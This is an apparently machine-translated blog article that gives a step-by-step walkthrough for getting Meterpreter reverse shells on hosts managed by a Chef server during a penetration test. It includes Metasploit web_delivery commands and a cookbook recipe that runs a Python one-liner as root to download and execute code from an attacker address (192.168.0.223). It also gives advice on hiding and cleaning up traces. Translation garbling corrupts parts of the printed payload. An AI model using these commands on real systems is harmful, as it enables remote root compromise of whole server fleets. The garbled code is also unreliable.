Shulou(Shulou.com)05/31 Report--

Editor to share with you how to get the Meterpreter Shell of the Chef server, I believe that most people do not know much about it, so share this article for your reference, I hope you can learn a lot after reading this article, let's go to know it!

The main reason is to warn friends who use Chef that your administrator account is likely to have been leaked in Chef web interface. Administrators are usually unable to set default administrative credentials. In this case, the Chef server home page will provide you with.

In a recent penetration test, I successfully won a Chef server. However, I don't know anything about Chef. I use Puppet more, so I spend most of my time using Puppet on the system side. Since I have never encountered Chef before, I need to find a way to use all sensitive hosts within a certain range of Chef infrastructure shell in the shortest possible time. The following is my implementation process.

Note: all of this is likely to be executed from the command line. I got an account through Chef web interface and spent most of my time on GUI. If you know how to do this on the command line, you can let me know through my contact information. Thank you!

First, you need to create a new administrative user to upload cookbooks. If you already have an administrative user who is used to it, you can ignore this step.

Make a note of the private RSA key provided to you by the interface after you create a new administrative user.

If you have not already installed Chef, please install it on your attack plane. Enter Chef URL when prompted. Use the hostname of Chef server in its SSL certificate (not the IP address or alias / cname), otherwise you may not be able to connect using knife eventually.

Apt-get install chef

After the installation is complete, configure knife to connect to the Chef server. Make sure you enter the URL and user name correctly. You can set other options as the default.

Knife configure

Write your private RSA key to the ~ / .chef directory (.pem file). In the meantime, make sure that you have configured your ~ / .chef / knife.rb file accordingly.

Using your private key, download the Chef server certificate and verify that the knife connection is working properly. Use the following command to do this.

Knife ssl fetchknife ssl check

Take a quick look at the available cookbooks to make sure the knife connection is working.

Knife cookbook list

Now, you need to create a cookbook and a recipe. I use the following command to do this. However, the command seems to have been deprecated, and you can follow the prompts to replace it.

Knife cookbook create evil

Next, let's start Metasploit and create a web-delivery multi-handler. I chose to use python multi-handler payload here.

Use exploit/multi/script/web_deliveryset SRVPORT 8080set SRVHOST 192.168.0.223set URIPATH 2w9kwS11set PAYLOAD python/meterpreter/reverse_tcpset LHOST 192.168.0.223set LPORT 8443set TARGET 0run

After successful execution, we will get the following output:

Python-c "import sys; upright imports importation _ ('urllib'+ {2 urllib'+). Request'} [sys.version_info [0]], fromlist= (' urlopen',)); r=u.urlopen ('http://192.168.0.223:8080/2w9kwS11');exec(r.read());")

Populate your cookbook template file. Everything you need below is in recipes/default.rb.

Execute "evil_commands" do command "python-c\" import sys; upright imports importation _ ('urllib'+ {2lazav). Request'} [sys.version_info [0]], fromlist= (' urlopen',)); r=u.urlopen ('http://192.168.0.223:8080/2w9kwS11');exec(r.read());\"" user "root" action: runend)

Populate the metadata.rb file. The following is a demonstration, try to avoid using strings like 'evil'' or 'pwnage'' in practice.

It's time to upload your Cookbook to the server.

Knife cookbook upload evil

Please confirm that your cookbook now exists in the Chef server. You can do the following on the command line or in the Web interface.

Knife cookbook list | grep evil

Navigate to the "Cookbooks" list on the site.

Assign cookbook recipe to the target you want to shell and add it to each node's running list. Go to the list of nodes, click the node you are interested in, and click Edit.

Find your cookbook recipe in the 'Available Recipes' list' in the lower left column and drag it to the 'Run List'' in the upper right corner. Click the 'Save Node' button at the bottom to submit the changes.

Look! A meterpreter shell was successfully obtained.

For operational security, once you have successfully obtained the shell connection, please return to the web interface and remove recipe from the running list of nodes that have been successfully connected. You don't need to generate multiple shell from the same endpoint.

After completing your task, be sure to remove any traces from the system you have interacted with. Kill your Meterpreter session, delete the administrative users you created and recipe. You can do this with the following command.

Close the session:

Sessions-K

Connection of the host to the knife:

Knife cookbook delete evil above is all the content of the article "how to get the Meterpreter Shell of Chef server". Thank you for reading! I believe we all have a certain understanding, hope to share the content to help you, if you want to learn more knowledge, welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.